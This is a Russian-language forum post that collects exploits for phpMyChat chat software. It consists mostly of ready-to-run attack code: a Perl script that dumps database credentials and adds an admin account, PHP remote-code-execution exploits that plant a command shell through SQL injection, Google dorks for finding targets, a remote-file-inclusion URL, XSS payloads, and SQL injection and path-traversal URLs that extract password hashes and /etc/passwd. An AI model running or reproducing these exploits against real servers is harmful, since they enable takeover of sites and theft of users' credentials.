[Обзор] Уязвимости phpMyChat Доброй ночиМой новый обзор посвящён описанию уязвимостей чатов phpMyChat. Офф. сайт: http://www.phpheaven.net/phpmychat:home Сорцы: Скачать phpMyChat 0.14.5 Remote Improper File Permissions Exploit PHP: #################################################################### # # _____ _ # | ___| | _____ ___ # | |_ | |/ _ \ \ /\ / / # | _| | | (_) \ V V / # |_| |_|\___/ \_/\_/ # Security Group. # # * phpMyChat remote sploit * # by sysbug # # C:\Perl\bin>perl pmc.pl www.kublooddrive.com /chat # /* Mysql dump : # * C_DB_HOST : localhost # * C_DB_NAME : jhawk_pchat1 # * C_DB_USER : jhawk_pchat1 # * C_DB_PASS : vvejTjeLgB # * # * Adding Admin .... # * login:jhawk # * pwd:owned # */ # C:\Perl\bin> # # Credits: all my friends! use IO::Socket; if(@ARGV < 2){ usage(); } main(); sub sock(){ $ock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>'tcp',Timeout=>10)|| die " * s0ck null -\n"; print $ock "$path\r\n"; print $ock "Accept: */*\r\n"; print $ock "Accept-Language: pt\r\n"; print $ock "Accept-Encoding: gzip, deflate\r\n"; print $ock "User-Agent: l33t br0ws3r\r\n"; print $ock "Host: $host\r\n"; print $ock "Connection: Keep-Alive\r\n\r\n\r\n"; $path = ''; } sub main(){ print "/*\n"; print " * sploit remote phpMychat\n"; print " * by sysbug\n"; print " *\n"; $host = $ARGV[0]; $folder = $ARGV[1]; $path = "GET $folder/chat/setup.php3?next=1 HTTP/1.1"; sock(); $result =1; while($recv = <$ock>){ if($recv =~ /(C_DB_PASS|C_DB_USER|C_DB_NAME|C_DB_HOST)(.*)(VALUE=)(")(.*)(">)/){ $c++; print " * Mysql dump :\n" if($result); print " * $1 : $5\n"; $mysql[$c] = $5; $result = ''; } else{ print " * sploit failed! 
\n"; print " *\\ \n"; exit; } } close($ock); $path = "GET $folder/chat/setup.php3?next=2&Form_Send=2&C_DB_TYPE=mysql&C_DB_HOST=$mysql[1]&C_DB_NAME=$mysql[2]&C_DB_USER=$mysql[3]&C_DB_PASS=$mysql[4]&C_MSG_TBL=messages&C_REG_TBL=reg_users&C_USR_TBL=users&C_BAN_TBL=ban_users&C_MSG_DEL=96&C_USR_DEL=4&C_REG_DEL=0&C_PUB_CHAT_ROOMS=Blood+Talk&C_PRIV_CHAT_ROOMS=&C_MULTI_LANG=1&C_LANGUAGE=english&C_REQUIRE_REGISTER=1&C_SHOW_ADMIN=1&C_SHOW_DEL_PROF=1&C_VERSION=1&C_BANISH=1&C_NO_SWEAR=1&C_SAVE=*&C_USE_SMILIES=1&C_HTML_TAGS_KEEP=simple&C_HTML_TAGS_SHOW=1&C_TMZ_OFFSET=0&C_MSG_ORDER=0&C_MSG_NB=20&C_MSG_REFRESH=10&C_SHOW_TIMESTAMP=1&C_NOTIFY=1&C_WELCOME=1 HTTP/1.1"; sock(); while($recv = <$ock>){ if($recv =~ /(ADM_LOG)(.*)(VALUE=)(")(.*)(">)/){ $c++; $mysql[$c] = $5; } } close($ock); $pwd="owned"; $path = "GET $folder/chat/setup.php3?next=2&C_DB_TYPE=mysql&C_DB_HOST=$mysql[1]&C_DB_NAME=$mysql[2]&C_DB_USER=$mysql[3]&C_DB_PASS=$mysql[4]&C_MSG_TBL=messages&C_REG_TBL=reg_users&C_USR_TBL=users&C_BAN_TBL=ban_users&C_MSG_DEL=96&C_USR_DEL=4&C_REG_DEL=0&C_PUB_CHAT_ROOMS=Blood+Talk&C_PRIV_CHAT_ROOMS=&C_MULTI_LANG=1&C_LANGUAGE=english&C_REQUIRE_REGISTER=1&C_SHOW_ADMIN=1&C_SHOW_DEL_PROF=1&C_VERSION=1&C_BANISH=1&C_NO_SWEAR=1&C_SAVE=*&C_USE_SMILIES=1&C_HTML_TAGS_KEEP=simple&C_HTML_TAGS_SHOW=1&C_TMZ_OFFSET=0&C_MSG_ORDER=0&C_MSG_NB=20&C_MSG_REFRESH=10&C_SHOW_TIMESTAMP=1&C_NOTIFY=1&C_WELCOME=1&ADM_LOG=$mysql[5]&ADM_PASS=$pwd&Form_Send=3&Exist_Adm=1 HTTP/1.1"; sock(); if($mysql[5]){ print " *\n * Adding Admin ....\n * login:$mysql[5]\n * pwd:$pwd \n *\\ \n"; } else{ print " * sploit failed! 
\n"; print " *\\ \n"; } close($ock); } sub usage(){ print "/*\n"; print " * sploit remote phpMychat\n"; print " * by sysbug\n"; print " * usage: perl $0 xpl.pl <host>\n"; print " * example: perl $0 xpl.pl www.site.com\n"; print " * perl $0 xpl.pl www.site.com /chat\n"; print " */\n"; exit; } # milw0rm.com [2004-12-22] phpMyChat <= 0.14.5 (SYS enter) Remote Code Execution Exploit PHP: #!/usr/bin/php -q -d short_open_tag=on <? echo "PHPMyChat <= 0.14.5 \"SYS enter\" remote cmmnds xctn 0day\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "dork: intext:\"2000-2001 The phpHeaven Team\" -sourceforge\r\n\r\n"; if ($argc<4) { echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path: path to PHPMyChat\r\n"; echo "cmd: a shell command\r\n"; echo "Options:\r\n"; echo " -p[port]: specify a port other than 80\r\n"; echo " -P[ip:port]: specify a proxy\r\n"; echo "Examples:\r\n"; echo "php ".$argv[0]." localhost /phpmychat/ cat ./config/config.lib.php3\r\n"; echo "php ".$argv[0]." localhost /phpmychat/ ls -la -p81\r\n"; echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; die; } # explaination: # # sql injection in chat/messagesL.php3 near lines 56-60: # ... # If ($room != stripslashes($R)) // Same nick in another room # { # $DbLink->query("INSERT INTO ".C_MSG_TBL." VALUES ($T, '$R', 'SYS exit', '', ".time().", '', 'sprintf(L_EXIT_ROM, \"".special_char($U,$Latin1,1)."\")')"); # $kicked = 3; # } # ... # # have a look to "T" argument, it is not sanitized before to be used in our # INSERT query, so we can inject all the values we want and store them # in the c_messages table. Also it is not delimited by quotes & we do not need # quotes to extend the query, so this works regardless of magic_quotes_gpc settings # # sprintf() should be passed to an eval() near line 197: # # ... 
# // "System" messages # else # { # if ($Dest == " *") # { # $Message = "[".L_ANNOUNCE."]<BDO dir=\"${textDirection}\"></BDO> ".$Message; # } # else # { # if ($Dest != "") $NewMsg .= "<B><BDO dir=\"${textDirection}\"></BDO>>[".htmlspecialchars(stripslashes($Dest))."]<BDO dir=\"${textDirection}\"></BDO></B> "; # $Message = str_replace("$","\\$",$Message); // avoid '$' chars in nick to be parsed bellow # eval("\$Message = $Message;"); # }; # $NewMsg .= "<SPAN CLASS=\"notify\">".$Message."</SPAN></P>"; # }; # ... # # but what happen if we inject a system() call instead and if we simulate # to be the SYS user? :) # # this is 0day, enjoy it error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } $host=$argv[1]; $path=$argv[2]; $action=$argv[3]; $cmd="";$port=80;$proxy=""; for ($i=3; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } $cmd=urlencode($cmd); if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} #step 1 -> SQL Injection, works regardsless of any magic_quotes_gpc seetings, it is an INSERT INTO query #let's store a shell in c_messages table $L="L=english"; $U=""; $T ="0,"; //type $T.="CHAR(68,101,102,97,117,108,116),"; //room (Default) $T.="CHAR(83,89,83,32,101,110,116,101,114),"; //username (SYS enter) $T.="0,";//latin1 $T.="9999999999,";//m_time $T.="1,";//address //message (our encoded shell -> system($_GET[cmd]);die ) ,if system() is disabled, reencode a new one with passthru() or exec() //u can use an unlimited number of chars for this $T.="CHAR(115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,100,105,101))/*"; $T="T=".urlencode($T); for ($i=0; $i<=1; $i++) //redo { srand(make_seed()); $anumber = rand(1,99999); $R="R=Default".$anumber; //random, it must be different from the previous one $packet ="GET ".$p."chat/messagesL.php3?$L&$U&$T&$R HTTP/1.0\r\n"; $packet.="X-Forwarded-For: suntzuuuuuuu\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Host: 
".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; //debug //echo quick_dump($packet); sendpacketii($packet); } sleep(2); #step 2 -> shell is passed to an eval(), so we launch commands $packet ="GET ".$p."chat/messagesL.php3?L=english&R=Default&N=9999&T=0&U=SYS%20enter&cmd=".$cmd." HTTP/1.0\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; //debug //echo quick_dump($packet); sendpacketii($packet); echo $html; ?> # milw0rm.com [2006-04-05] phpMyChat 0.15.0dev (SYS enter) Remote Code Execution Exploit PHP: #!/usr/bin/php -q -d short_open_tag=on <? echo "PHPMyChat 0.15.0dev \"SYS enter\" remote cmmnds xctn 0day (again)\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "-> works with magic_quotes_gpc=Off\r\n\r\n"; echo "dork: intext:\"2000-2001 The phpHeaven Team\" -sourceforge\r\n\r\n"; if ($argc<4) { echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path: path to PHPMyChat\r\n"; echo "cmd: a shell command\r\n"; echo "Options:\r\n"; echo " -p[port]: specify a port other than 80\r\n"; echo " -P[ip:port]: specify a proxy\r\n"; echo "Examples:\r\n"; echo "php ".$argv[0]." localhost /phpmychat/ cat ./config/config.lib.php\r\n"; echo "php ".$argv[0]." localhost /phpmychat/ ls -la -p81\r\n"; echo "php ".$argv[0]." 
localhost / ls -la -P1.1.1.1:80\r\n"; die; } # explaination: # # only modified this one: # # http://retrogod.altervista.org/phpmychat_0145_xpl.html # # actually I tested this package: # # http://prdownloads.sourceforge.net/phpmychat/phpMyChat-0.15.0-dev20050206.tgz?download # # code is no properly patched 'cause, if magic_quotes_gpc = Off, you can inject # an "always true" statement in PWD_Hash argument error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } $host=$argv[1]; $path=$argv[2]; $action=$argv[3]; $cmd="";$port=80;$proxy=""; for ($i=3; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } $cmd=urlencode($cmd); if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} #step 1 -> Register, we need an online user srand(make_seed()); $anumber = rand(1,99999); $data="FORM_SEND=1"; $data.="&L=italian"; $data.="&U=suntzu".$anumber; $data.="&pmc_password=suntzoi".$anumber; $data.="&FIRSTNAME=suntzu"; $data.="&LASTNAME=suntzoi"; $data.="&GENDER=1"; $data.="&COUNTRY="; $data.="&WEBSITE="; $data.="&[email protected]"; $data.="&SHOWEMAIL=0"; $data.="&submit_type=Registrati"; $packet ="POST ".$p."chat/register.php HTTP/1.0\r\n"; $packet.="X-Forwarded-For: 127.0.0.1\r\n"; //spoof , a nice ip value for c_regusers table $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: CookieLang=italian;\r\n\r\n"; $packet.=$data; #debug #echo quick_dump($packet); sendpacketii($packet); #step 2 -> Login $packet ="GET ".$p."chat/loader.php?From=..%2FphpMyChat.php3&L=italian&Ver=H"; 
$packet.="&U=suntzu".$anumber."&R=Default&T=1&D=10&N=20&ST=1&NT=1&PWD_Hash=".md5("suntzoi".$anumber)."&First=1 HTTP/1.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: CookieLang=italian; CookieUsername=suntzu".$anumber."; CookieRoom=Default; CookieRoomType=1\r\n\r\n"; #debug #echo quick_dump($packet); sendpacketii($packet); #step 3 -> SQL Injection, let's store a shell in c_messages table $L="L=english"; $U="U=SYS%20enter"; $T ="0,"; //type $T.="CHAR(68,101,102,97,117,108,116),"; //room (Default) $T.="CHAR(83,89,83,32,101,110,116,101,114),"; //username (SYS enter) $T.="0,";//latin1 $T.="9999999999,";//m_time $T.="1,";//address //message (our encoded shell -> system($_GET[cmd]);die ) ,if system() is disabled, reencode a new one with passthru() or exec() //u can use an unlimited number of chars for this $T.="CHAR(115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,100,105,101))/*"; $T="T=".urlencode($T); $PWD="'or'a'='a' UNION SELECT c_users.room, c_users.status, c_users.ip FROM c_users, c_reg_users WHERE 'a'='a' LIMIT 1/*"; $PWD=urlencode($PWD); for ($i=0; $i<=1; $i++) //redo { srand(make_seed()); $anumber = rand(1,99999); $R="R=Default".$anumber; //random, it must be different from the previous one $packet ="GET ".$p."chat/messagesL.php?$L&$U&$T&$R&PWD_Hash=$PWD HTTP/1.0\r\n"; $packet.="X-Forwarded-For: suntzuuuuuuu\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; #debug #echo quick_dump($packet); sendpacketii($packet); } sleep(1); #step 4 -> shell is passed to an eval(), so we launch commands $packet ="GET ".$p."chat/messagesL.php?L=english&R=Default&N=9999&T=0&U=SYS%20enter&cmd=".$cmd."&PWD_Hash=$PWD HTTP/1.0\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; #debug #echo quick_dump($packet); sendpacketii($packet); echo $html; ?> # milw0rm.com [2006-04-06] RFI and Multiple 
XSS in PhpMyChat Remote File Inclusion: Code: POC = http://localhost/path_to_phpMychat/chat/users_popupL.php3?From=http://evilshell Multiple XSS Code: a. Vulnerable URL: http://localhost/phpmychat/chat/deluser.php3 Parameter = LIMIT POC: http://localhost/phpmychat/chat/config/start_page.css.php3?Charset=iso-8859- 1&medium=10&FontName= >"'><img%20src%3D%26%23x6a;%26%23x61;% 26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23 x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert (%26quot;Successfull%26%23x20;XSS%26%23x20;Test%26% 23x20;Here%26quot;)> b. Vulnerable URL: http://www.localhost/mychat/chat/deluser.php3 Parameter = LIMIT POC: http://www.localhost/phpmychat/chat/deluser.php3?L=english&Link=&LIMIT=> "'><img%20src%3D%26%23x6a;%26%23x61;%2 6%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x 72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert( %26quot;Successfull%26%23x20;XSS%26%23x20;Test%26%23x 20;Here%26quot;)>&AUTH_USERNAME=&AUTH_PASSWORD= c. Vulnerable URL: http://www.localhost/phpmychat/chat/edituser.php3 Parameter = Link (still looking for a PoC ;) d. Vulnerable URL: http://localhost/phpmychat/chat/users_popupL.php3 Parameter = LastCheck POC: http://localhost/mychat/chat/users_popupL.php3?From=..%2FphpMyChat. php3&L=english&LastCheck= "></STYLE><STYLE>@import"javascript: alert('This%20XSS%20Is%20Xss')";</STYLE>' e. Vulnerable URL: http://localhost/phpmychat/chat/users_popupL.php3 Parameter = B POC: http://localhost/phpmychat/chat/users_popupL.php3?From=..%2FphpMyChat. php3&L=english&LastCheck=1196698786&B= >"><script>alert("This%20XSS%20Test%20Succe ssful")</script> f. Vulnerable URL: http://localhost/phmychat/chat/users_popupL.php3 Parameter = From POC: http://localhost/phpmychat/chat/users_popupL. php3?From=>"><script>alert("This%20XSS%20Test% 20Successful")</script> g. Vulnerable URL: http://localhost/phpmychat/chat/config/start_page.css.php3 Parameter = FontName Parameter = medium h.
Vulnerable URL: http://localhost/phpmychat/chat/config/style.css.php3 Parameter = FontName Parameter = medium POC: http://localhost/phpmychat//mychat/chat/config/style.css.php3?Charset=iso-8859- 1&medium=10&FontName=>"'><img%20src%3D%26% 23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;% 26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23 x74;%26%23x3a;alert(%26quot;This%26%23x20;XSS%26% 23x20;Test%26%23x20;Successful%26quot;)> Try the second one yourself, or mail me for the PoC :P (c)
phpMyChat 0.14.6 Уязвимости чата версии 0.14.6 SQL-injection в модулях usersH.php и usersL.php POC: Code: http://127.0.0.1/phpmychat/usersH.php?L=english&R='%20union%20select%20concat(username,0x3a,password),2,3,4%20from%20c_reg_users/* SQL-injection в модуле whois_popup.php Code: #!/usr/bin/perl $argc = $#ARGV + 1; unless ($argc == 2) { print "usage: $0 host path_to_chat\n"; print "Ex. $0 127.0.0.1 phpmychat\n"; exit -1; } #http://127.0.0.1/phpmychat/whois_popup.php?L=russian&U='%20union%20select%201,username,password,4,5,6,7,8,9,10,11%20from%20c_reg_users%20limit%201/* use LWP::UserAgent; use HTTP::Request; $host = $ARGV[0]; $dir = $ARGV[1]; $file = "whois_popup.php"; $param = "?L=english&U='%20union%20select%201,concat(0x242424,username,0x3a,password,0x242424),3,4,5,6,7,8,9,10,11%20from%20c_reg_users%20limit%200,1/*"; $ua = LWP::UserAgent->new; #$ua->proxy ("http", "http://$proxy_host:$proxy_port/"); $url = "http://$host/$dir/$file$param"; $req = HTTP::Request->new (GET => $url); $req->content_type ("text/html"); $res = $ua->request ($req); die ("ERROR: " . $res->status_line) unless ($res->is_success); $content = $res->content; if ($content =~ /\x24\x24\x24([^:]+:.{32})\x24\x24\x24/) { print "$1\n"; } exit 0; зы. Solide Snake, plz, поправь ссылку на их сайт
1. Обход аутентификации. Удалённый атакующий может отправить сценарию edituser.php3 специально сформированный POST-запрос, в котором параметр “do_not_login” имеет значение “false”. 2. Обход каталога (directory traversal) в admin.php3. Судя по примерам ниже, значения параметров “sheet” и “What”, по-видимому, используются как путь к файлу без проверки (в примерах запрос также содержит имя пользователя и хеш пароля в параметрах “user” и “pswd”), поэтому удалённый атакующий может получить доступ к важной информации на системе. 3. Межсайтовое выполнение сценариев (XSS). Данные, передаваемые в параметре “C” сценария input.php3, не проверяются, что позволяет атакующему выполнить произвольный сценарий в браузере жертвы. 4. SQL-инъекция. Различные параметры сценария usersL.php3 (в примерах ниже — “R”) не проверяются, и удалённый атакующий может изменять SQL-запросы. Пример/Эксплоит: Code: http://[TARGET]/chat/admin.php3?From=admin.php3&What= Body&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=[FILE]%00 Code: http://[TARGET]/chat/admin.php3?From=admin.php3&What =Body&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=/../../../../../../etc/ Code: http://[TARGET]/chat/admin.php3?From=admin.php3&What =[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=1 Code: http://[TARGET]/chat/admin.php3?From=admin.php3&What=/../../../../../../etc/ passwd%00&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&s Code: http://[TARGET]/chat/usersL.php3?L=russian&R ='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/* Code: http://[TARGET]/chat/usersL.php3?L=russian&R ='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/* Code: http://[TARGET]/chat/usersL.php3?L=russian&R ='%20UNION%20SELECT%20email,null,null,null %20FROM%20%20c_reg_users